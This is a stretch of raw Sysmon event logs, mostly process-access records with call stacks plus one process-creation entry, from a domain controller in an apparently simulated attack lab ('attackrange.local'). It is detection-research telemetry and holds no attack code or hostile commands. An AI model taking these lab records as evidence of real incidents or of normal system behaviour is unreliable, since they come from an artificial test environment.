12:03:45.934{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.934{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.934{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1B01-00000000AE01}7144C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.934{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1B01-00000000AE01}7144C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.936{266CAFBE-6521-6064-1B01-00000000AE01}7144C:\Windows\System32\InstallAgent.exe10.0.14393.4169 (rs1_release.210107-1130)InstallAgentMicrosoft® Windows® Operating SystemMicrosoft CorporationInstallAgent.exeC:\Windows\System32\InstallAgent.exe 
-EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=88C7DCDD735B31E4F5620E4B9F38C87F,SHA256=5EF1322B96F176C4EA4B8304CAF8B45E2E42C3188AA82ED1FD6196AFC04B7297,IMPHASH=EAB6EF3DE625719627DC808B5F0501FC{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 23542300x80000000000000008896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.918{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.100.etlMD5=3A9083C46E1F63F9A7F1A86BDFC260DC,SHA256=F8A35E45D800A01A55F2B5EE5081DCD8C5D6710D8D9620FEE48D2EFD4838BF54,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.903{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.903{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.903{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.903{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.903{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1801-00000000AE01}4616C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.871{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.871{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.871{266CAFBE-6521-6064-1901-00000000AE01}63207120C:\Windows\system32\conhost.exe{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.871{266CAFBE-6521-6064-1A01-00000000AE01}52407132C:\Windows\system32\conhost.exe{266CAFBE-6521-6064-1801-00000000AE01}4616C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1A01-00000000AE01}5240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.840{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
